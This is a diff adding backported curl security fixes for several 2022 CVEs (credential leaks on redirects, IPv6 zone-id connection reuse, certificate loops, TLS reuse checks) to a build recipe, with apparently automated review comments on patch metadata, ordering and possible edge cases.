+ 3 files changed, 13 insertions(+), 6 deletions(-)
+
+diff --git a/lib/http.c b/lib/http.c
+index 8b16c09..5291c07 100644
+--- a/lib/http.c
++++ b/lib/http.c
+@@ -732,10 +732,10 @@ output_auth_headers(struct connectdata *conn,
+ }
+
+ /*
+- * allow_auth_to_host() tells if autentication, cookies or other "sensitive
+- * data" can (still) be sent to this host.
++ * Curl_allow_auth_to_host() tells if authentication, cookies or other
++ * "sensitive data" can (still) be sent to this host.
+ */
+-static bool allow_auth_to_host(struct Curl_easy *data)
++bool Curl_allow_auth_to_host(struct Curl_easy *data)
+ {
+ struct connectdata *conn = data->conn;
+ return (!data->state.this_is_a_follow ||
+@@ -816,7 +816,7 @@ Curl_http_output_auth(struct connectdata *conn,
+
+ /* To prevent the user+password to get sent to other than the original host
+ due to a location-follow */
+- if(allow_auth_to_host(data)
++ if(Curl_allow_auth_to_host(data)
+ || conn->bits.netrc
+ )
+ result = output_auth_headers(conn, authhost, request, path, FALSE);
+@@ -1891,7 +1891,7 @@ CURLcode Curl_add_custom_headers(struct connectdata *conn,
+ checkprefix("Cookie:", compare)) &&
+ /* be careful of sending this potentially sensitive header to
+ other hosts */
+- !allow_auth_to_host(data))
++ !Curl_allow_auth_to_host(data))
+ ;
+ else {
+ result = Curl_add_bufferf(&req_buffer, "%s\r\n", compare);
+diff --git a/lib/http.h b/lib/http.h
+index 4c1825f..4fbae1d 100644
+--- a/lib/http.h
++++ b/lib/http.h
+@@ -273,4 +273,10 @@ Curl_http_output_auth(struct connectdata *conn,
+ bool proxytunnel); /* TRUE if this is the request setting
+ up the proxy tunnel */
+
++/*
++ * Curl_allow_auth_to_host() tells if authentication, cookies or other
++ * "sensitive data" can (still) be sent to this host.
++ */
++bool Curl_allow_auth_to_host(struct Curl_easy *data);
++
+ #endif /* HEADER_CURL_HTTP_H */
+diff --git a/lib/vtls/openssl.c b/lib/vtls/openssl.c
+index 006a8c8..a14cecc 100644
+--- a/lib/vtls/openssl.c
++++ b/lib/vtls/openssl.c
+@@ -2739,7 +2739,8 @@ static CURLcode ossl_connect_step1(struct connectdata *conn, int sockindex)
+ #endif
+
+ #ifdef USE_TLS_SRP
+- if(ssl_authtype == CURL_TLSAUTH_SRP) {
++ if((ssl_authtype == CURL_TLSAUTH_SRP) &&
++ Curl_allow_auth_to_host(data)) {
+ char * const ssl_username = SSL_SET_OPTION(username);
+
+ infof(data, "Using TLS-SRP username: %s\n", ssl_username);
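Review bot: The header of this patch has no `CVE:` tag line, so the CVE it addresses is recorded only in the file name, whereas CVE-2022-27775.patch and CVE-2022-27776.patch in this same commit do carry one. Adding `CVE: CVE-2022-27774` next to `Upstream-Status:` would keep the patch metadata consistent across the series. The same applies to CVE-2022-27774-4.patch, CVE-2022-27781.patch, CVE-2022-27782-1.patch, CVE-2022-27782-2.patch and CVE-2022-32206.patch.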
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27774-4.patch b/meta/recipes-support/curl/curl/CVE-2022-27774-4.patch
new file mode 100644
index 0000000000..2258681cab
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27774-4.patch
@@ -0,0 +1,35 @@
+From 7395752e2f7b87dc8c8f2a7137075e2da554aaea Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Tue, 26 Apr 2022 07:46:19 +0200
+Subject: [PATCH] gnutls: don't leak the SRP credentials in redirects
+
+Follow-up to 620ea21410030 and 139a54ed0a172a
+
+Reported-by: Harry Sintonen
+Closes #8752
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/093531556203decd92d92bccd431edbe5561781c]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/vtls/gtls.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/lib/vtls/gtls.c b/lib/vtls/gtls.c
+index 8c05102..3d0758d 100644
+--- a/lib/vtls/gtls.c
++++ b/lib/vtls/gtls.c
+@@ -581,11 +581,11 @@ gtls_connect_step1(struct connectdata *conn,
+ }
+
+ #ifdef USE_TLS_SRP
+- if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP) {
++ if((SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP) &&
++ Curl_allow_auth_to_host(data)) {
+ infof(data, "Using TLS-SRP username: %s\n", SSL_SET_OPTION(username));
+
+- rc = gnutls_srp_allocate_client_credentials(
+- &BACKEND->srp_client_cred);
++ rc = gnutls_srp_allocate_client_credentials(&BACKEND->srp_client_cred);
+ if(rc != GNUTLS_E_SUCCESS) {
+ failf(data, "gnutls_srp_allocate_client_cred() failed: %s",
+ gnutls_strerror(rc));
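Review bot: Only the allocation of `BACKEND->srp_client_cred` becomes conditional on `Curl_allow_auth_to_host(data)` here, while the later `gnutls_credentials_set(session, GNUTLS_CRD_SRP, BACKEND->srp_client_cred)` and the `gnutls_srp_free_client_credentials()` call in `Curl_gtls_shutdown` still test the auth type alone (both are visible as context in CVE-2022-27782-1.patch). On a redirect where the guard is false, those sites would operate on a credential object that was never allocated. Whether that is harmless depends on the backend struct being zero-initialised and on how GnuTLS treats a NULL credential, neither of which the hunk shows. Consider also guarding both sites on the pointer, e.g. `if(BACKEND->srp_client_cred)`. gtls_connect_step1 begins and ends outside the hunk.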
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27775.patch b/meta/recipes-support/curl/curl/CVE-2022-27775.patch
new file mode 100644
index 0000000000..b3fe7b4494
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27775.patch
@@ -0,0 +1,39 @@
+From 058f98dc3fe595f21dc26a5b9b1699e519ba5705 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 25 Apr 2022 11:48:00 +0200
+Subject: [PATCH] conncache: include the zone id in the "bundle" hashkey
+
+Make connections to two separate IPv6 zone ids create separate
+connections.
+
+Reported-by: Harry Sintonen
+Bug: https://curl.se/docs/CVE-2022-27775.html
+Closes #8747
+---
+ lib/conncache.c | 8 ++++++--
+ 1 file changed, 6 insertions(+), 2 deletions(-)
+
+CVE: CVE-2022-27775
+Upstream-Status: Backport [https://github.com/curl/curl/commit/058f98dc3fe595f21dc26a5b9b1699e519ba5705.patch]
+Comment: Refreshed patch
+Signed-off-by: Sana.Kazi <Sana.Kazi@kpit.com>
+
+diff --git a/lib/conncache.c b/lib/conncache.c
+index ec669b971dc3..8948b53fa500 100644
+--- a/lib/conncache.c
++++ b/lib/conncache.c
+@@ -156,8 +156,12 @@
+ /* report back which name we used */
+ *hostp = hostname;
+
+- /* put the number first so that the hostname gets cut off if too long */
+- msnprintf(buf, len, "%ld%s", port, hostname);
++ /* put the numbers first so that the hostname gets cut off if too long */
++#ifdef ENABLE_IPV6
++ msnprintf(buf, len, "%u/%ld/%s", conn->scope_id, port, hostname);
++#else
++ msnprintf(buf, len, "%ld/%s", port, hostname);
++#endif
+ }
+
+ /* Returns number of connections currently held in the connection cache.
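Review bot: The updated comment explains the field order but not why the zone id is now part of the key, which is the security-relevant part of this change. Something like `/* the IPv6 zone id is part of the key so that the same address in two different zones never shares a connection bundle */` above the `ENABLE_IPV6` branch would record the intent given in the commit message. The enclosing function starts outside the hunk.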
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27776.patch b/meta/recipes-support/curl/curl/CVE-2022-27776.patch
new file mode 100644
index 0000000000..1a13df2d95
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27776.patch
@@ -0,0 +1,114 @@
+From 6e659993952aa5f90f48864be84a1bbb047fc258 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 25 Apr 2022 13:05:40 +0200
+Subject: [PATCH] http: avoid auth/cookie on redirects same host diff port
+
+CVE-2022-27776
+
+Reported-by: Harry Sintonen
+Bug: https://curl.se/docs/CVE-2022-27776.html
+Closes #8749
+---
+ lib/http.c | 34 ++++++++++++++++++++++------------
+ lib/urldata.h | 16 +++++++++-------
+ 2 files changed, 31 insertions(+), 19 deletions(-)
+
+CVE: CVE-2022-27776
+Upstream-Status: Backport [https://github.com/curl/curl/commit/6e659993952aa5f90f48864be84a1bbb047fc258.patch]
+Comment: Refreshed patch
+Signed-off-by: Sana.Kazi <Sana.Kazi@kpit.com>
+
+diff --git a/lib/http.c b/lib/http.c
+index ce79fc4e31c8..f0476f3b9272 100644
+--- a/lib/http.c
++++ b/lib/http.c
+@@ -731,6 +731,21 @@
+ return CURLE_OK;
+ }
+
++/*
++ * allow_auth_to_host() tells if autentication, cookies or other "sensitive
++ * data" can (still) be sent to this host.
++ */
++static bool allow_auth_to_host(struct Curl_easy *data)
++{
++ struct connectdata *conn = data->conn;
++ return (!data->state.this_is_a_follow ||
++ data->set.allow_auth_to_other_hosts ||
++ (data->state.first_host &&
++ strcasecompare(data->state.first_host, conn->host.name) &&
++ (data->state.first_remote_port == conn->remote_port) &&
++ (data->state.first_remote_protocol == conn->handler->protocol)));
++}
++
+ /**
+ * Curl_http_output_auth() setups the authentication headers for the
+ * host/proxy and the correct authentication
+@@ -799,15 +799,12 @@
+ with it */
+ authproxy->done = TRUE;
+
+- /* To prevent the user+password to get sent to other than the original
+- host due to a location-follow, we do some weirdo checks here */
+- if(!data->state.this_is_a_follow ||
+- conn->bits.netrc ||
+- !data->state.first_host ||
+- data->set.allow_auth_to_other_hosts ||
+- strcasecompare(data->state.first_host, conn->host.name)) {
++ /* To prevent the user+password to get sent to other than the original host
++ due to a location-follow */
++ if(allow_auth_to_host(data)
++ || conn->bits.netrc
++ )
+ result = output_auth_headers(conn, authhost, request, path, FALSE);
+- }
+ else
+ authhost->done = TRUE;
+
+@@ -1879,10 +1891,7 @@
+ checkprefix("Cookie:", compare)) &&
+ /* be careful of sending this potentially sensitive header to
+ other hosts */
+- (data->state.this_is_a_follow &&
+- data->state.first_host &&
+- !data->set.allow_auth_to_other_hosts &&
+- !strcasecompare(data->state.first_host, conn->host.name)))
++ !allow_auth_to_host(data))
+ ;
+ else {
+ result = Curl_add_bufferf(&req_buffer, "%s\r\n", compare);
+@@ -2065,6 +2074,7 @@
+ return CURLE_OUT_OF_MEMORY;
+
+ data->state.first_remote_port = conn->remote_port;
++ data->state.first_remote_protocol = conn->handler->protocol;
+ }
+
+ if((conn->handler->protocol&(PROTO_FAMILY_HTTP|CURLPROTO_FTP)) &&
+diff --git a/lib/urldata.h b/lib/urldata.h
+index 1d89b8d7fa68..ef2174d9e727 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -1342,13 +1342,15 @@
+ char *ulbuf; /* allocated upload buffer or NULL */
+ curl_off_t current_speed; /* the ProgressShow() function sets this,
+ bytes / second */
+- char *first_host; /* host name of the first (not followed) request.
+- if set, this should be the host name that we will
+- sent authorization to, no else. Used to make Location:
+- following not keep sending user+password... This is
+- strdup() data.
+- */
+- int first_remote_port; /* remote port of the first (not followed) request */
++
++ /* host name, port number and protocol of the first (not followed) request.
++ if set, this should be the host name that we will sent authorization to,
++ no else. Used to make Location: following not keep sending user+password.
++ This is strdup()ed data. */
++ char *first_host;
++ int first_remote_port;
++ unsigned int first_remote_protocol;
++
+ struct curl_ssl_session *session; /* array of 'max_ssl_sessions' size */
+ long sessionage; /* number of the most recent session */
+ unsigned int tempcount; /* number of entries in use in tempwrite, 0 - 3 */
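Review bot: This patch introduces `static bool allow_auth_to_host()`, and CVE-2022-27774-3.patch in the same commit renames that function to `Curl_allow_auth_to_host()`, so the 27774 series only applies on top of this patch even though its number is lower. The recipe's SRC_URI is not part of this chunk; confirm it lists CVE-2022-27776.patch before CVE-2022-27774-3.patch, and consider a `Comment:` line in the header recording the dependency. The added comment also spells "authentication" as "autentication", which the later patch corrects.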
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27781.patch b/meta/recipes-support/curl/curl/CVE-2022-27781.patch
new file mode 100644
index 0000000000..ea1bc22928
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27781.patch
@@ -0,0 +1,46 @@
+From 7a1f183039a6a6c9099a114f5e5c94777413c767 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 9 May 2022 10:07:15 +0200
+Subject: [PATCH] nss: return error if seemingly stuck in a cert loop
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+CVE-2022-27781
+
+Reported-by: Florian Kohnhäuser
+Bug: https://curl.se/docs/CVE-2022-27781.html
+Closes #8822
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/5c7da89d404bf59c8dd82a001119a16d18365917]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/vtls/nss.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/lib/vtls/nss.c b/lib/vtls/nss.c
+index 375c78b..86102f7 100644
+--- a/lib/vtls/nss.c
++++ b/lib/vtls/nss.c
+@@ -950,6 +950,9 @@ static void display_cert_info(struct Curl_easy *data,
+ PR_Free(common_name);
+ }
+
++/* A number of certs that will never occur in a real server handshake */
++#define TOO_MANY_CERTS 300
++
+ static CURLcode display_conn_info(struct connectdata *conn, PRFileDesc *sock)
+ {
+ CURLcode result = CURLE_OK;
+@@ -986,6 +989,11 @@ static CURLcode display_conn_info(struct connectdata *conn, PRFileDesc *sock)
+ cert2 = CERT_FindCertIssuer(cert, now, certUsageSSLCA);
+ while(cert2) {
+ i++;
++ if(i >= TOO_MANY_CERTS) {
++ CERT_DestroyCertificate(cert2);
++ failf(data, "certificate loop");
++ return CURLE_SSL_CERTPROBLEM;
++ }
+ if(cert2->isRoot) {
+ CERT_DestroyCertificate(cert2);
+ break;
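Review bot: The added early return calls `failf(data, "certificate loop")`, but the signature shown for this tree is `display_conn_info(struct connectdata *conn, PRFileDesc *sock)` and the patch adds no `data` local, so whether `data` is in scope depends on lines outside the hunk. Since NSS is an optional TLS backend, a missing declaration would only surface in an NSS-enabled build; if there is none, `failf(conn->data, "certificate loop");` is the form that matches this signature. The early return also appears to leave `cert`, the certificate the walk started from, unreleased unless it is freed elsewhere; the rest of the function is outside the hunk.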
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27782-1.patch b/meta/recipes-support/curl/curl/CVE-2022-27782-1.patch
new file mode 100644
index 0000000000..6b6d0e1938
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27782-1.patch
@@ -0,0 +1,363 @@
+From 907a16c832d9ce0ffa7e9b2297548063095a7242 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 9 May 2022 23:13:53 +0200
+Subject: [PATCH] tls: check more TLS details for connection reuse
+
+CVE-2022-27782
+
+Reported-by: Harry Sintonen
+Bug: https://curl.se/docs/CVE-2022-27782.html
+Closes #8825
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/f18af4f874cecab82a9797e8c7541e0990c7a64c]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/setopt.c | 29 +++++++++++++++++------------
+ lib/url.c | 17 ++++++++++-------
+ lib/urldata.h | 13 +++++++------
+ lib/vtls/gtls.c | 30 ++++++++++++++++--------------
+ lib/vtls/mbedtls.c | 2 +-
+ lib/vtls/nss.c | 6 +++---
+ lib/vtls/openssl.c | 10 +++++-----
+ lib/vtls/vtls.c | 1 +
+ 8 files changed, 60 insertions(+), 48 deletions(-)
+
+diff --git a/lib/setopt.c b/lib/setopt.c
+index 4648c87..bebb2e4 100644
+--- a/lib/setopt.c
++++ b/lib/setopt.c
+@@ -2130,6 +2130,7 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
+
+ case CURLOPT_SSL_OPTIONS:
+ arg = va_arg(param, long);
++ data->set.ssl.primary.ssl_options = (unsigned char)(arg & 0xff);
+ data->set.ssl.enable_beast =
+ (bool)((arg&CURLSSLOPT_ALLOW_BEAST) ? TRUE : FALSE);
+ data->set.ssl.no_revoke = !!(arg & CURLSSLOPT_NO_REVOKE);
+@@ -2139,6 +2140,7 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
+ #ifndef CURL_DISABLE_PROXY
+ case CURLOPT_PROXY_SSL_OPTIONS:
+ arg = va_arg(param, long);
++ data->set.proxy_ssl.primary.ssl_options = (unsigned char)(arg & 0xff);
+ data->set.proxy_ssl.enable_beast =
+ (bool)((arg&CURLSSLOPT_ALLOW_BEAST) ? TRUE : FALSE);
+ data->set.proxy_ssl.no_revoke = !!(arg & CURLSSLOPT_NO_REVOKE);
+@@ -2541,44 +2543,47 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
+ case CURLOPT_TLSAUTH_USERNAME:
+ result = Curl_setstropt(&data->set.str[STRING_TLSAUTH_USERNAME_ORIG],
+ va_arg(param, char *));
+- if(data->set.str[STRING_TLSAUTH_USERNAME_ORIG] && !data->set.ssl.authtype)
+- data->set.ssl.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
++ if(data->set.str[STRING_TLSAUTH_USERNAME_ORIG] &&
++ !data->set.ssl.primary.authtype)
++ data->set.ssl.primary.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
+ break;
+ case CURLOPT_PROXY_TLSAUTH_USERNAME:
+ result = Curl_setstropt(&data->set.str[STRING_TLSAUTH_USERNAME_PROXY],
+ va_arg(param, char *));
+ if(data->set.str[STRING_TLSAUTH_USERNAME_PROXY] &&
+- !data->set.proxy_ssl.authtype)
+- data->set.proxy_ssl.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
++ !data->set.proxy_ssl.primary.authtype)
++ data->set.proxy_ssl.primary.authtype = CURL_TLSAUTH_SRP; /* default to
++ SRP */
+ break;
+ case CURLOPT_TLSAUTH_PASSWORD:
+ result = Curl_setstropt(&data->set.str[STRING_TLSAUTH_PASSWORD_ORIG],
+ va_arg(param, char *));
+- if(data->set.str[STRING_TLSAUTH_USERNAME_ORIG] && !data->set.ssl.authtype)
+- data->set.ssl.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
++ if(data->set.str[STRING_TLSAUTH_USERNAME_ORIG] &&
++ !data->set.ssl.primary.authtype)
++ data->set.ssl.primary.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
+ break;
+ case CURLOPT_PROXY_TLSAUTH_PASSWORD:
+ result = Curl_setstropt(&data->set.str[STRING_TLSAUTH_PASSWORD_PROXY],
+ va_arg(param, char *));
+ if(data->set.str[STRING_TLSAUTH_USERNAME_PROXY] &&
+- !data->set.proxy_ssl.authtype)
+- data->set.proxy_ssl.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
++ !data->set.proxy_ssl.primary.authtype)
++ data->set.proxy_ssl.primary.authtype = CURL_TLSAUTH_SRP; /* default */
+ break;
+ case CURLOPT_TLSAUTH_TYPE:
+ argptr = va_arg(param, char *);
+ if(!argptr ||
+ strncasecompare(argptr, "SRP", strlen("SRP")))
+- data->set.ssl.authtype = CURL_TLSAUTH_SRP;
++ data->set.ssl.primary.authtype = CURL_TLSAUTH_SRP;
+ else
+- data->set.ssl.authtype = CURL_TLSAUTH_NONE;
++ data->set.ssl.primary.authtype = CURL_TLSAUTH_NONE;
+ break;
+ case CURLOPT_PROXY_TLSAUTH_TYPE:
+ argptr = va_arg(param, char *);
+ if(!argptr ||
+ strncasecompare(argptr, "SRP", strlen("SRP")))
+- data->set.proxy_ssl.authtype = CURL_TLSAUTH_SRP;
++ data->set.proxy_ssl.primary.authtype = CURL_TLSAUTH_SRP;
+ else
+- data->set.proxy_ssl.authtype = CURL_TLSAUTH_NONE;
++ data->set.proxy_ssl.primary.authtype = CURL_TLSAUTH_NONE;
+ break;
+ #endif
+ #ifdef USE_ARES
+diff --git a/lib/url.c b/lib/url.c
+index efa3dc7..6518be9 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -482,7 +482,7 @@ CURLcode Curl_init_userdefined(struct Curl_easy *data)
+ set->ssl.primary.verifypeer = TRUE;
+ set->ssl.primary.verifyhost = TRUE;
+ #ifdef USE_TLS_SRP
+- set->ssl.authtype = CURL_TLSAUTH_NONE;
++ set->ssl.primary.authtype = CURL_TLSAUTH_NONE;
+ #endif
+ set->ssh_auth_types = CURLSSH_AUTH_DEFAULT; /* defaults to any auth
+ type */
+@@ -3594,8 +3594,9 @@ static CURLcode create_conn(struct Curl_easy *data,
+ data->set.proxy_ssl.primary.pinned_key =
+ data->set.str[STRING_SSL_PINNEDPUBLICKEY_PROXY];
+
+- data->set.ssl.CRLfile = data->set.str[STRING_SSL_CRLFILE_ORIG];
+- data->set.proxy_ssl.CRLfile = data->set.str[STRING_SSL_CRLFILE_PROXY];
++ data->set.ssl.primary.CRLfile = data->set.str[STRING_SSL_CRLFILE_ORIG];
++ data->set.proxy_ssl.primary.CRLfile =
++ data->set.str[STRING_SSL_CRLFILE_PROXY];
+ data->set.ssl.cert = data->set.str[STRING_CERT_ORIG];
+ data->set.proxy_ssl.cert = data->set.str[STRING_CERT_PROXY];
+ data->set.ssl.cert_type = data->set.str[STRING_CERT_TYPE_ORIG];
+@@ -3609,10 +3610,12 @@ static CURLcode create_conn(struct Curl_easy *data,
+ data->set.ssl.primary.clientcert = data->set.str[STRING_CERT_ORIG];
+ data->set.proxy_ssl.primary.clientcert = data->set.str[STRING_CERT_PROXY];
+ #ifdef USE_TLS_SRP
+- data->set.ssl.username = data->set.str[STRING_TLSAUTH_USERNAME_ORIG];
+- data->set.proxy_ssl.username = data->set.str[STRING_TLSAUTH_USERNAME_PROXY];
+- data->set.ssl.password = data->set.str[STRING_TLSAUTH_PASSWORD_ORIG];
+- data->set.proxy_ssl.password = data->set.str[STRING_TLSAUTH_PASSWORD_PROXY];
++ data->set.ssl.primary.username = data->set.str[STRING_TLSAUTH_USERNAME_ORIG];
++ data->set.proxy_ssl.primary.username =
++ data->set.str[STRING_TLSAUTH_USERNAME_PROXY];
++ data->set.ssl.primary.password = data->set.str[STRING_TLSAUTH_PASSWORD_ORIG];
++ data->set.proxy_ssl.primary.password =
++ data->set.str[STRING_TLSAUTH_PASSWORD_PROXY];
+ #endif
+
+ if(!Curl_clone_primary_ssl_config(&data->set.ssl.primary,
+diff --git a/lib/urldata.h b/lib/urldata.h
+index ab1b267..ad0ef8f 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -231,6 +231,13 @@ struct ssl_primary_config {
+ char *cipher_list; /* list of ciphers to use */
+ char *cipher_list13; /* list of TLS 1.3 cipher suites to use */
+ char *pinned_key;
++ char *CRLfile; /* CRL to check certificate revocation */
++ #ifdef USE_TLS_SRP
++ char *username; /* TLS username (for, e.g., SRP) */
++ char *password; /* TLS password (for, e.g., SRP) */
++ enum CURL_TLSAUTH authtype; /* TLS authentication type (default SRP) */
++ #endif
++ unsigned char ssl_options; /* the CURLOPT_SSL_OPTIONS bitmask */
+ BIT(verifypeer); /* set TRUE if this is desired */
+ BIT(verifyhost); /* set TRUE if CN/SAN must match hostname */
+ BIT(verifystatus); /* set TRUE if certificate status must be checked */
+@@ -240,7 +247,6 @@ struct ssl_primary_config {
+ struct ssl_config_data {
+ struct ssl_primary_config primary;
+ long certverifyresult; /* result from the certificate verification */
+- char *CRLfile; /* CRL to check certificate revocation */
+ curl_ssl_ctx_callback fsslctx; /* function to initialize ssl ctx */
+ void *fsslctxp; /* parameter for call back */
+ char *cert; /* client certificate file name */
+@@ -248,11 +254,6 @@ struct ssl_config_data {
+ char *key; /* private key file name */
+ char *key_type; /* format for private key (default: PEM) */
+ char *key_passwd; /* plain text private key password */
+-#ifdef USE_TLS_SRP
+- char *username; /* TLS username (for, e.g., SRP) */
+- char *password; /* TLS password (for, e.g., SRP) */
+- enum CURL_TLSAUTH authtype; /* TLS authentication type (default SRP) */
+-#endif
+ BIT(certinfo); /* gather lots of certificate info */
+ BIT(falsestart);
+ BIT(enable_beast); /* allow this flaw for interoperability's sake*/
+diff --git a/lib/vtls/gtls.c b/lib/vtls/gtls.c
+index 3d0758d..92c301c 100644
+--- a/lib/vtls/gtls.c
++++ b/lib/vtls/gtls.c
+@@ -581,9 +581,10 @@ gtls_connect_step1(struct connectdata *conn,
+ }
+
+ #ifdef USE_TLS_SRP
+- if((SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP) &&
++ if((SSL_SET_OPTION(primary.authtype) == CURL_TLSAUTH_SRP) &&
+ Curl_allow_auth_to_host(data)) {
+- infof(data, "Using TLS-SRP username: %s\n", SSL_SET_OPTION(username));
++ infof(data, "Using TLS-SRP username: %s\n",
++ SSL_SET_OPTION(primary.username));
+
+ rc = gnutls_srp_allocate_client_credentials(&BACKEND->srp_client_cred);
+ if(rc != GNUTLS_E_SUCCESS) {
+@@ -593,8 +594,8 @@ gtls_connect_step1(struct connectdata *conn,
+ }
+
+ rc = gnutls_srp_set_client_credentials(BACKEND->srp_client_cred,
+- SSL_SET_OPTION(username),
+- SSL_SET_OPTION(password));
++ SSL_SET_OPTION(primary.username),
++ SSL_SET_OPTION(primary.password));
+ if(rc != GNUTLS_E_SUCCESS) {
+ failf(data, "gnutls_srp_set_client_cred() failed: %s",
+ gnutls_strerror(rc));
+@@ -648,19 +649,19 @@ gtls_connect_step1(struct connectdata *conn,
+ }
+ #endif
+
+- if(SSL_SET_OPTION(CRLfile)) {
++ if(SSL_SET_OPTION(primary.CRLfile)) {
+ /* set the CRL list file */
+ rc = gnutls_certificate_set_x509_crl_file(BACKEND->cred,
+- SSL_SET_OPTION(CRLfile),
++ SSL_SET_OPTION(primary.CRLfile),
+ GNUTLS_X509_FMT_PEM);
+ if(rc < 0) {
+ failf(data, "error reading crl file %s (%s)",
+- SSL_SET_OPTION(CRLfile), gnutls_strerror(rc));
++ SSL_SET_OPTION(primary.CRLfile), gnutls_strerror(rc));
+ return CURLE_SSL_CRL_BADFILE;
+ }
+ else
+ infof(data, "found %d CRL in %s\n",
+- rc, SSL_SET_OPTION(CRLfile));
++ rc, SSL_SET_OPTION(primary.CRLfile));
+ }
+
+ /* Initialize TLS session as a client */
+@@ -879,7 +880,7 @@ gtls_connect_step1(struct connectdata *conn,
+
+ #ifdef USE_TLS_SRP
+ /* put the credentials to the current session */
+- if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP) {
++ if(SSL_SET_OPTION(primary.authtype) == CURL_TLSAUTH_SRP) {
+ rc = gnutls_credentials_set(session, GNUTLS_CRD_SRP,
+ BACKEND->srp_client_cred);
+ if(rc != GNUTLS_E_SUCCESS) {
+@@ -1061,8 +1062,8 @@ gtls_connect_step3(struct connectdata *conn,
+ SSL_CONN_CONFIG(verifyhost) ||
+ SSL_CONN_CONFIG(issuercert)) {
+ #ifdef USE_TLS_SRP
+- if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP
+- && SSL_SET_OPTION(username) != NULL
++ if(SSL_SET_OPTION(primary.authtype) == CURL_TLSAUTH_SRP
++ && SSL_SET_OPTION(primary.username) != NULL
+ && !SSL_CONN_CONFIG(verifypeer)
+ && gnutls_cipher_get(session)) {
+ /* no peer cert, but auth is ok if we have SRP user and cipher and no
+@@ -1116,7 +1117,8 @@ gtls_connect_step3(struct connectdata *conn,
+ failf(data, "server certificate verification failed. CAfile: %s "
+ "CRLfile: %s", SSL_CONN_CONFIG(CAfile) ? SSL_CONN_CONFIG(CAfile):
+ "none",
+- SSL_SET_OPTION(CRLfile)?SSL_SET_OPTION(CRLfile):"none");
++ SSL_SET_OPTION(primary.CRLfile) ?
++ SSL_SET_OPTION(primary.CRLfile) : "none");
+ return CURLE_PEER_FAILED_VERIFICATION;
+ }
+ else
+@@ -1703,8 +1705,8 @@ static int Curl_gtls_shutdown(struct connectdata *conn, int sockindex)
+ gnutls_certificate_free_credentials(BACKEND->cred);
+
+ #ifdef USE_TLS_SRP
+- if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP
+- && SSL_SET_OPTION(username) != NULL)
++ if(SSL_SET_OPTION(primary.authtype) == CURL_TLSAUTH_SRP
++ && SSL_SET_OPTION(primary.username) != NULL)
+ gnutls_srp_free_client_credentials(BACKEND->srp_client_cred);
+ #endif
+
+diff --git a/lib/vtls/mbedtls.c b/lib/vtls/mbedtls.c
+index 19df847..62d2b00 100644
+--- a/lib/vtls/mbedtls.c
++++ b/lib/vtls/mbedtls.c
+@@ -245,7 +245,7 @@ mbed_connect_step1(struct connectdata *conn,
+ const bool verifypeer = SSL_CONN_CONFIG(verifypeer);
+ const char * const ssl_capath = SSL_CONN_CONFIG(CApath);
+ char * const ssl_cert = SSL_SET_OPTION(cert);
+- const char * const ssl_crlfile = SSL_SET_OPTION(CRLfile);
++ const char * const ssl_crlfile = SSL_SET_OPTION(primary.CRLfile);
+ const char * const hostname = SSL_IS_PROXY() ? conn->http_proxy.host.name :
+ conn->host.name;
+ const long int port = SSL_IS_PROXY() ? conn->port : conn->remote_port;
+diff --git a/lib/vtls/nss.c b/lib/vtls/nss.c
+index 86102f7..62fd7a2 100644
+--- a/lib/vtls/nss.c
++++ b/lib/vtls/nss.c
+@@ -1955,13 +1955,13 @@ static CURLcode nss_setup_connect(struct connectdata *conn, int sockindex)
+ }
+ }
+
+- if(SSL_SET_OPTION(CRLfile)) {
+- const CURLcode rv = nss_load_crl(SSL_SET_OPTION(CRLfile));
++ if(SSL_SET_OPTION(primary.CRLfile)) {
++ const CURLcode rv = nss_load_crl(SSL_SET_OPTION(primary.CRLfile));
+ if(rv) {
+ result = rv;
+ goto error;
+ }
+- infof(data, " CRLfile: %s\n", SSL_SET_OPTION(CRLfile));
++ infof(data, " CRLfile: %s\n", SSL_SET_OPTION(primary.CRLfile));
